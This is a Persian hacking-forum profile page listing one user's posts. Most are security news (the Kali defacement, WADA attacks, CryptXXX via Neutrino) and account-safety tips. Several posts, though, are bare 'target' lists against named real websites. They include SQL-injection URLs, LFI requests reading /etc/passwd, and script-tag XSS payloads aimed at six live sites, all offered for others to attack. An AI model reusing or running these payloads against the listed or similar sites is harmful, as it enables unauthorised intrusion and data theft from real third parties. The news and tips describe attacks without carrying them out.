mhdei1380

کاربر تازه وارد
  • تعداد ارسال ها

    223
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    17

آخرین بار برد mhdei1380 در آبان 12 2016

mhdei1380 یکی از رکورد داران بیشترین تعداد پسند مطالب است!

8 دنبال کننده

درباره mhdei1380

  • درجه

Contact Methods

  • Skype
    تلگرام Mr_x2

Profile Information

  • جنسیت
    آقا
  • محل سکونت
    کافی نت

آخرین بازدید کنندگان نمایه

1,184 بازدید کننده نمایه
  1. وقتی که با واژه hacking و هک کردن مواجه می شویم ، به این نکته پی میبریم که امنیت ۱۰۰٪ نیست. این همان اتفاقی است که برای سیستم عامل Kali لینوکس از توزیع های BackTrack که برای تست نفوذ استفاده می شود رخ داده است. به گزارش آی تی اس ان (پایگاه خبری امنیت فناوری اطلاعات) ،چند روز پیش گروه هکری TGT یا The GreaT TeAm از لیبی زیردامنه lists.kali.org مربوط به وب سایت رسمی سیستم عامل Kali linux را هک و دیفیس کرد. این گروه در صفحه دیفیس خود عبارت “Hacked By The GreaT TeAm –TGT” را درج کردند. براساس گزارش هکرنیوز هاستینگ زیر دامنه lists.kali.org سایت mailmanlist.net می باشد که به ادعای هکرهای لیبیایی این سایت دارای آسیب پذیری Heartbleed بوده است. آنها توضیح داده اند که پس از بررسی کوکی های به سرقت رفته از سایت mailmanlist.net ، از آسیب پذیری Heartbleed موجود در لیست پستی کایلی لینوکس توانسته است به حساب کاربری سایت دسترسی پیدا کنند. لینک اثبات در zone_h http://www.zone-h.org/mirror/id/22278878?zh=1
  2. mhdei1380

    جمعی از هکرهای یک گروه ناشناس، سرورهای آژانس مبارزه جهانی با دوپینگ و دادگاه داوری ورزشی را مورد هجوم قرار دادند. گروه هکری ناشناس، برای اولین بار فعالیت مخرب خود را روی سرورهای دادگاه ورزشی (TAS) شروع کرد. پس از این اقدام، گروه هکری نام برده یک رونوشت از اطلاعات موجود در پایگاه داده سرور نام برده را به سرقت بردند. لازم به ذکر است که داده های کارکنان در این حملات مورد سرقت قرار نگرفته اند. کارشناسان معتقدند که تا به حال هیچ گونه از اطلاعات به سرقت رفته این وب سایت منتشر نشده اند، اما این در حالی است که مگی دوراند (Maggie Durand)، سخنگوی آژانس مبارزه جهانی ضد دوپینگ المپیک (WADA) ریو 2016، گفت اطلاعات به سرقت رفته توسط این گروه هکری منتشرشده است؛ همچنین در ادامه اعلام کرد اسناد مربوط به تست های گرفته شده از ورزشکاران برای مشخص شدن نمونه دوپینگ آن ها در این حمله از دید مهاجمان در امان بوده اند. چندی پیش گروه هکری نام برده شروع به راه اندازی یک کمپین گسترده علیه دولت و کمیته المپیک برزیل کرد، پس از این اقدامات گروه ناشناس مدعی شد که با استفاده از این کمپین موفق به ایجاد حمله اختلال سرویس توزیع شده (DDOS) در زیرساخت های کمیته المپیک شده است. امروزه با توجه به زمان برگزاری المپیک، مهاجمان با هدف قرار دادن وب سایت ها و زیرساخت های ورزشی برزیل، فعالیت مخرب خود را پیش می برند. همچنین حمله به وب سایت های کمیته ضد دوپینگ و دادگاه ورزشی به عنوان یکی از منحصربه فردترین حملات اختلال سرویس توزیع شده توسط این گروه هکری علیه زیرساخت های ورزشی به شمار می روند. منبع: سایبربان
  3. طبق گفتۀ محققان شرکت Sucuri در دو ماه گذشته هزاران وب سایت مبتنی بر سیستم مدیریت محتوای وردپرس و جوملا تسخیر شده اند تا کاربران را به سمت باج افزار CryptXXX هدایت کنند. درحالی که گفته می شود این کمپین آلوده سازی از 20 خرداد آغازشده، تخمین زده می شود که حداقل دو هزار وب سایت با این هدف آلوده شده باشند. اما احتمالاً آمار واقعی حدود پنج برابر این مقدار است چراکه تخمین ذکرشده براساس اطلاعات جمع آوری شده از طریق اسکنر SiteCheck بوده که اطلاعاتی محدود در اختیار دارد. مشخصه اصلی این حمله آن است که از دامنه های realstatistics[.]info و realstatistics[.]pro استفاده می کند تا کاربران را به صفحه (Landig Page) مربوط به کیت اکسپلویت Neutrino هدایت کند. Neutrino که اکنون پیشروترین تهدید در میان کیت های اکسپلویت به حساب می آید، تلاش می کند تا از آسیب پذیری های Flash یا PDF در سیستم های هدف استفاده کرده و باج افزار CryptXXX را نصب نماید. محققان نهایتاً موفق به کشف رابطه دامنه ها با Blackhat‑TDS شدند. این نشان می دهد که آن ها تنها کاربران معمولی را به صفحه فرود هدایت می کردند در حالی که برای رنج های IP مربوط به بلک لیست خود، صفحه ای پاک تحویل می دادند (این لیست عمدتاً مربوط به IP مربوط به فروشنده ها، موتورهای جستجو و سرویس های اسکنِ وب می شود.) Sucuri عنوان کرده که 60 درصد سایت های آلوده از نسخه های قدیمی وردپرس و جوملا و همچنین حمله گران احتمالاً از مؤلفه های آسیب پذیری همچون پلاگین ها و اکستنشن ها استفاده کرده اند. محققان این شرکت معتقدند که استفاده از CMS از رده خارج شده معمولاً نشان دهنده آن است که گردانندگان وب سایت احتمالاً سایر مؤلفه های امنیتی را نیز به روزرسانی نکرده اند. با استفاده از هزاران وب سایت آلوده (که برخی سایت های مرتبط با امنیت همچون PCI Policy Portal را نیز شامل می شود)، نفوذگران می توانند ده ها هزار کاربر را هم زمان مورد حمله قرار دهند که نهایتاً موجب آلودگی بسیاری از آن ها به باج افزار CryptXXX می شود. چند هفته پیش محققان SentinelOne افشاء کردند که گردانندگان CryptXXX در مدت زمان سه هفته ای، مبلغ پنجاه هزار دلار در تنها یک آدرس بیت کوین دست یافته اند. CryptXXX اکنون به مهم ترین باج افزارها تبدیل شده و در دو ماه گذشته چندین آپدیت برای آن ارائه شده است. منبع: خبرگزاری تسنیم
  4. mhdei1380

    به احتمال زیاد تا کنون بیشتر با محیط های با رابط گرافیکی (GUI) کار کرده اید ، اما رابط کاربر دیگری که لینوکس دارد رابط خط فرمان یا Command Line Interface ( CLI ) است . قدرت حقیقی لینوکس در این رابط نهفته است. زمانی می توان با یک سیستم عامل راحتر کار کرد که امکان کار با خط فرمان در آن فراهم شده باشد و در لینوکس این مهم صورت گرفته است Learning-Linux-Konsol.pdf
  5. mhdei1380

    sql http://www.airgateway.af/cms.php?id=-6
  6. mhdei1380

    lfi http://www2.ffg.at/anmeldungen/eranettransport/index.php?file=/etc/passwd http://kcirick.awardspace.com/mainindex.php?file=/etc/passwd
  7. mhdei1380

    xss http://www.no-cuts-on-research.eu/index.php?file=<script>alert('XSS')</script> http://www.eash.eu/openletter2011/index.php?file=<script>alert('XSS')</script> http://www.italycleantech.com/index.php?file=<script>alert('XSS')</script> http://www2.ffg.at/anmeldungen/eranettransport/index.php?file=<script>alert('XSS')</script> http://www.russiantechnologies.eu/index.php?file=<script>alert('XSS')</script> https://www.enterprise-europe-network.ch/marketplace/index.php?file=<script>alert(/XSS/)</script>
  8. mhdei1380

    تارگت : http://www.spcc.com.sa/content.php?id=-68
  9. ه گزارش واحد امنیت سایبربان؛ سرویس امنیت فدرال دولت روسیه (FSB)، مدعی است که روش های جمع آوری اطلاعات و رمزگشایی از اطلاعات کاربران برخی شبکه های اجتماعی را در اختیار دارد. تنها دو هفته بعد از دستور پوتین مبنی بر لزوم گسترش نظارت ها بر ارائه دهندگان خدمات اینترنتی در این کشور، نیروهای امنیتی روس از موفقیت در ورود به برخی شبکه های اجتماعی خبر دادند، ولی هیچ نکته ای مبنی بر چگونگی نفوذ به این شبکه های اجتماعی را منتشر نکرده اند. نیروهای امنیتی روس، اعلام کردند که با استفاده از روش های بخصوصی، قادر هستند تا یک درب پشتی روی سرویس های اینترنتی نظیر فیس بوک، جیمیل، واتس اپ و تلگرام ایجاد کنند و از آن طریق، به شنود ارتباطات کاربران این شبکه های اجتماعی بپردازند. ماه پیش، روسیه قانونی را تصویب کرد که در آن، دولت از نهادهای امنیتی خواسته بود نظارت بیشتر و بهتری بر اینترنت و هر شرکتی که خدمات اینترنتی را به شهروندان روس ارائه می کنند داشته باشند. در این قانون، شرکت های مذکور مجبورند یک درب پشتی اجباری را در اختیار نهادهای امنیتی روس قرار دهند تا دولت از طریق آن ها به راحتی بتواند مکالمات شهروندان را در این شبکه های اجتماعی نظارت و رصد کند. همچنین چنانچه هرکدام از این شرکت های اینترنتی، از همکاری با دولت روسیه سر باز بزنند، سازمان امنیت فدرال، قادر خواهد بود تا جریمه ای معادل یک میلیون روبل روسیه را برای آن ها در نظر بگیرد. لازم به ذکر است که تمامی شرکت هایی که نام آن ها در این گزارش آورده شده است، تاکنون اظهارنظری در مورد این قانون جدید و اعلام سرویس امنیت فدرال روسیه نکرده اند و همین موضوع، بر ابهامات افزوده است. بر اساس قانون جدید دولت روسیه، اپراتورهای تلفن همراه روسی، باید از تاریخ 1 جولای 2018، به مدت سه سال، تمامی تماس های تلفنی، پیامک ها، صوت ها و فیلم های ضبط شده را جمع آوری و ذخیره کند؛ موضوعی که ممکن است میلیون ها دلار هزینه روی دست دولت بگذارد. کارشناسان امنیتی مدعی هستند که انگلستان، در صورت تصویب چنین قانونی در کشورش، تنها به مدت یک سال امکان ذخیره سازی اطلاعات را دارد. نیکولای نیکیفروف (Nikolai Nikiforov)، در آخرین توییت خودش در این رابطه گفت: «سرویس هایی مانند واتس آپ و وایبر که تمایل به ترک روسیه دارند، می توانند به جای این کار، به راحتی خدمات خود را در یکی از 48 آزمایشگاهی که در روسیه برای این کار تعبیه شده است، ثبت کنند تا ما مطمئن شویم در صورت به کارگیری آن ها توسط مقامات دولتی روسیه، این سرویس های اینترنتی، نمی توانند اطلاعات محرمانه و دولتی را به سرقت ببرند.» لازم به ذکر است که روسیه، بعد از گسترش تنش ها با غرب و خصوصاً آمریکا بر سر مسائل مختلف منطقه ای و بین المللی، اقدامات امنیتی متعددی را در فضای اینترنت انجام داده و دائماً نیز در حال شدت بخشیدن به این اقدامات است. چند ماه پیش نیز، خبری در رسانه های جهان منتشر شد که ادعا می کرد پوتین، دستور راه اندازی شبکه ملی اطلاعات و یافتن راهکاری برای جداسازی اینترنت این کشور از شبکه جهانی را در صورت بروز یک حمله سایبری گسترده صادر کرده است. تمامی این موارد، حاکی از آن است که مقامات روس، عمق خطر نفوذ از طریق فضای مجازی و اینترنت را احساس کرده اند و به دنبال یافتن راهکاری مناسب برای به حداقل رساندن خطرات آن هستند.
  10. هکرها به تازگی موفق شدند برخی اطلاعات کاربری فروشگاه اینترنتی آمازون و اطلاعاتی نظیر آدرس های ایمیل و اطلاعات این چنینی را به سرقت برده و برای فروش در اینترنت قرار دهند. البته هکری که موفق به انجام این کار شد ادعا کرده که یک سرور بی نام و نشان را هدف حمله خود قرار داده که در این سرور، اطلاعات وبگاه های بسیاری از جمله آمازون نیز قرار داشته است. ظاهراً اطلاعات مسروقه، توسط هکر به قیمت بسیار ناچیزی معادل 0.02 بیت کوین یا 13.51 دلار، برای فروش گذاشته شده است. هکر مذکور در این رابطه، با ارسال متنی به یک شرکت امنیت سایبری اسرائیلی به نام Hacked-DB گفت که اطلاعات مسروقه، اطلاعاتی نیست که به صورت مستقیم از طریق فروشگاه آمازون قابل دسترسی باشد و از طریق نفوذ به سروری فرعی که متعلق به آمازون است، به دست آمده است. فروشگاه آمازون، یک فروشگاه اینترنتی است که به کاربران اجازه می دهد اجناس نو و دست دوم خود را برای فروش در این فروشگاه به نمایش بگذارند. آن چیزی که تجربه حملات گذشته به وبگاه هایی با تعداد کاربران بالا نشان می دهد این است که هکرها در کمتر موردی از انجام این گونه حملات، به فکر سرقت پول هستند و بیشتر، خود اطلاعات مسروقه به دردشان می خورد؛ چرا که این اطلاعات می تواند برای سازمان دهی حملات بزرگ تر بعدی مورد استفاده قرار بگیرد. در چنین مواردی و پیش از انجام هرگونه اقدامی، اغلب کارشناسان امنیتی به کاربران این وبگاه ها توصیه می کنند که ابتدا رمزهای عبور خود را تغییر دهند تا میزان خطر حملات را به کمترین میزان ممکن برسانند.
  11. بالا بردن امنیت اکانت گوگل Gmail با توجه به اینکه برای ذخیره بازی در سیستم عامل اندروید، نیاز به استفاده از اکانت جیمیل می باشد، بالا بردن امنیت آن، به منزله حفظ کردن بازی می باشد. رایج بودن جیمیل و ساخت ساده آن باعث شده تا بیشتر در معرض خطر باشد. هکرهای زیادی به فکر سوء استفاده از حساب های کاربران ایمیل گوگل هستند. برای بالا بردن امنیت جیمیل راه های زیر پیشنهاد می شود. عدم اعتماد به هر نرم افزار و سایتی : بد افزار هایی وجود دارد که بر روی گوشی نصب می شود که باعث از دست رفتن اطلاعات اکانت جیمیل شده و بازی را دچار اختلال می کند که به زبان ساده تر باعث از دست رفتن اکانت می شود. این بد افزار هیچ گونه علایمی ندارد و به طور کاملا پنهان عمل می کند تغییراتی مانند تغییر پسورد جیمیل و اختلال در ورود به بازی و مصرف منابع موجود و جم های شما در بازی می شود. این بد افزار از طریق برنامه هایی چون : دریافت جم رایگان که در بسیاری از وب سایت ها معرفی می شوند به موبایل کاربر وارد شده و اطلاعات وی را سرقت می کنند. همچنین به هیچ وجه به سایت هایی که ادعا می کنند بازی را هک کرده اند اعتماد نکنید زیرا آنها با وعده اینکه می توانند جم های شما را زیاد کنند معمولا از شما جیمیل و پسورد می خواهند و طمع هک کردن بازی و بی نهایت کردن جم، باعث می شود به آنها اعتماد کنید. همیشه این جمله را به یاد داشته باشید : هکی برای این بازی وجود ندارد!!! کلمه رمز با عبارت ترکیبی و غیرقابل حدس : بهترین روش برای امنیت بیشتر حساب کاربری استفاده از عبارت ترکیبی و غیر قابل حدس به عنوان رمز عبور است. از عباراتی استفاده کنید که هکرها نتوانند آن را به سادگی پیدا و از حسابتان سوءاستفاده کنند. به طور مثال از حروف کوچک و بزرگ و اعداد و نشانه ها در عبارت رمز استفاده کنید. برای تغییر پسورد جیمیل به این آدرس بروید : https://myaccount.google.com/security دقت کنید که پس از تعویض پسورد، پسورد جدید را در گوشی یا دستگاهی که با آن بازی می کنید وارد کنید تا اکانت شما از حالت سینک خارج نشود. ثبت اطلاعات ریکاوری : ایمیل و شماره تلفن ریکاوری بهترین ابزار برای بازیابی پسورد هنگام فراموشی رمز است. برای ثبت این اطلاعات به صورت زیر اقدام کنید. به این آدرس بروید : https://myaccount.google.com/security استفاده از ویژگی تایید دو مرحله ای (two step verification) : گوگل برای ارتقای سطح امنیتی ایمیل خود که بعدها در سایر ارائه دهندگان ایمیل نیز استفاده شد، دست به تغییراتی بزرگ و مهم زد. یکی از این تغییرات ، افزودن امنیت دو مرحله ای گوگل بود. امنیت دو مرحله ای گوگل به منظور افزایش ضریب امنیت، امکانی را برای کاربران فراهم آورد که در آن حتی اگر شخصی بتواند رمز عبور ایمیل شما را بدست بیاورد، بازهم نتواند وارد ایمیل شما شود. جدیدا گوگل این امکان را گسترش داده و روش های گوناگونی را به انتخاب کاربر برای تایید کد امنیتی، بوجود آورده است. تشکر فراموش نشه
  12. رعایت نکات زیر امکان بسته شدن یا بدست آوردن پسورد در یاهو رو به حداقل برسونید: 1- اینکه پسورد یاهو هک شه دیگه دورانش گذشته اونقدر یاهو امنیتش رو بالا برده که دیگه باید خواب بدست آوردن پسورد رو فقط ببینیم اگرم الان میگن فلانی پسورد یکی رو بدست آورده فقط به علت بی احتیاتی خودشه که دلایلش رو پایین نوشتم 2- آقا جان وقتی کارتون با مسنجر یا Mail Box تموم میشه حتمآ Sign Out کنید این موضوع خیلی مهمه در مبحث استفاده از ردپاها یا همون Cookies ها روشی هست که هر چند تعداد خیلی کمی میتونن ازش استفاده کنن ولی میتونن از همین ردپا ها استفاده کنن و ایمیل های شما رو بخونن ولی با این روش نمی تونن پسورد بدست بیارن 3- حتمآ از پسورد های امن استفاده کنید مثلآ ورندارین شماره تلفن خونتون رو بزارین پسورد یا اسم دوست دختر یا دوست پسرتون رو سعی کنید از کارکترهایی مثل @ در پسورد خودتون استفاده کنید این موضوع به خاطر اینه که با پسورد یاب ها نتونن کلمه عبورتون رو بدست بیارن هر چند باز بخاطر بالا رفتن امنیت یاهو این کارم تخته شده! 4- آقا یارو میگه میخواد واست فایل بفرسته مثلا عکس خودشو شما به سه شماره میگرید بعدم اجرا میکنید آخر سرم میگید Er000r داد یارو هم میگه اشکال از سیستم خودت شما میگین بیخیال حالا بگو منو چندتا دوست داری !!!!!!!!! 5- وقتی یه فایلی فرستاده میشه به پسوند اون دقت کنید دیگه تابلو که پسوند عکس چیزایی مثل Gif/Jpg/Bmp/Jpeg/ هست و فایل های اجرایی Exe/Com/Bat که اکثرا تروجان ها در قالب Exe فرستاده میشه 6- بعضی ها میان زرنگی کنن ور میدارن بعد از پسوند فایل چند تا Space میزنند همون طوری که میدونید در ویندوز نام فایل ها تا 11 کاراکتر نشون داده میشه و اگه بیشتر بشه ……. میزاره به اینم هواستون باشه که طرف کلک رشتی نزنه 7- این دیگه واقعا دورانش گذشته اونم استفاده از Fake Login هستش هر چند الان این راه بیشترین قربانی رو میده هواستون باشه تو هر صفحه که میرید تا لاگین دیدید ور ندارین پسوردتون رو بدید چون با اینکار پسورد خودتون رو دو دستی تقدیم به اون کسی کردین که این صفحه رو ساخته 8- یه کلک رشتی که کمتر به فکر کسی میرسه گذاشتن یک تروجان به جای فونت مخصوص یک سایته که روشی که هنوز خیلی لو نرفته فرض کنید وارد یک صفحه میشید که اصلا نمیتونید فونتشو بخونید حالا یه لینک پایین گذاشته که گفته آقا جان این فایل رو دریافت کنید بعد از نصب میتونید متن صفحه رو بخونید حالا حساب کنید به جای فایل مربوط به فونت یک تروجان باشه ! 9- یه نکته ای هست اونم در مورد بسته شدن مسنجره ببینید یکی از دلایل اصلی که شما تو ایمیل میتونید برید ولی مسنجرتون باز نمیشه استفاده از بوترهاست که اینم بر میگرده به سیستم امنیتی جدید یاهو که ممکنه مسنجر شما رو برای چند روز ببنده میگن هیچ راهی نیست که خود آدم درستش کنه و باید منتظر موند تا یاهو دلش به رحم بیاد و مسنجر رو باز کنه ولی باز میگن در این حال استفاده از Yahoo Messenger 5.0 و Yahoo Messenger 7.0 تونسته به یه عده hدم کمک کنه 10- اگر نه تو مسنجر میرید نه تو یاهو میل و اون پیغام گند بسته شدن ID رو میبیند که متاسفانه راهی برای درست کردنش نیست به جز اینکه زنگ بزنید یاهو دو ساعت صحبت کنید تا راضی بشن که خوب این موضوع واسه کسایی که تو آمریکان مثلآ برن دم در شرکت یاهو چهار تا داد بزنن یا چرخ ماشین اون دوتایی که یاهو رو ساختن پنچر کنن یا مثلا یه هزاری بزارن تو جیب یارو مثلآ بگن ما فامیل آقای پشکل پناهیان هستیم شاید یه کاری براتون کردن ولی کلآ اگه اینجوری شد دیگه باید به طور کامل و برای همیشه بیخیال Id تون بشین 11- یه سری Password Sender هست مثل K2ps که تمام پسوردهای کامپیوتر شما مثل اشتراک یا یاهو رو برای طرف میفرسته که باز اینم باید فایل مربوطه رو سیستم قربانی اجرا بشه خوب اگه طرف هواسش باشه چی رو داره اجرا میکنه مشکلی براش پیش نمیاد 12- شاید مهمترین نکته که خیلی ها بهش تاکید دارن استفاده از یک دیوار آتش مطمئن و همچنین یک آنتی ویروس قوی هست که هر دویه این برنامه ها همیشه باید بروز باشن مثلآ برای دیوار آتش میتونین از Zone Alarm یا Black Ice استفاده کنید آنتی ویروسم Norton , Pc-Cillin , Mcafee , KasperSky , BitDefender , Nod32 پیشنهاد میشه 13- هیچ وقت Cookies های اینترنت اکسپلور رو نگه ندارید و همیشه پاک کنید برای این کار از منوهای بالایه صفحه گزینه Tools رو انتخاب کنید و بعد Delete Cookies رو بزنید یا کلا از Setting گزینه Never رو بزنید تا دیگه ردپایی از شما باقی نمونه
  13. mhdei1380

    این فیلم هم بدک نیست The.Hacker.Wars.2014
  14. mhdei1380

    تارگت: دی http://www.nbrri.gov.ng/sites/news.php?ID=2
  15. mhdei1380

    تارگت: http://www.viadelvento.it/iniziativa.php?id=7